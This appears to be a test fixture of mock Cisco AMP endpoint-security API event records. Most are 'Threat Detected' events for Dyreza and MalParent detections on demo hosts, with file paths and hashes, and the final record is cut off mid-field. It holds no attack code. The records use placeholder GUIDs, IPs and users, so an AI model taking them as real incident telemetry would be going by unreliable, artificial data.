-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668099382575000,"timestamp":1610705694,"timestamp_nanoseconds":696000000,"date":"2021-01-15T10:14:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668099382575128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258371461579000,"timestamp":1610705692,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:14:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258371461578830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258324216938000,"timestamp":1610705681,"timestamp_nanoseconds":403000000,"date":"2021-01-15T10:14:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258324216938573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258272677331000,"timestamp":1610705669,"timestamp_nanoseconds":298000000,"date":"2021-01-15T10:14:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258272677331020","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258221137723000,"timestamp":1610705657,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:14:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258221137723467","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258169598116000,"timestamp":1610705645,"timestamp_nanoseconds":648000000,"date":"2021-01-15T10:14:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258169598115914","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257843180601000,"timestamp":1610705569,"timestamp_nanoseconds":536000000,"date":"2021-01-15T10:12:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257843180601413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":834324,"timestamp":1610705568,"timestamp_nanoseconds":82375000,"date":"2021-01-15T10:12:48+00:00","event_type":"Uninstall","event_type_id":553648166,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257791640994000,"timestamp":1610705557,"timestamp_nanoseconds":898000000,"date":"2021-01-15T10:12:37+00:00","event_type":"Threat 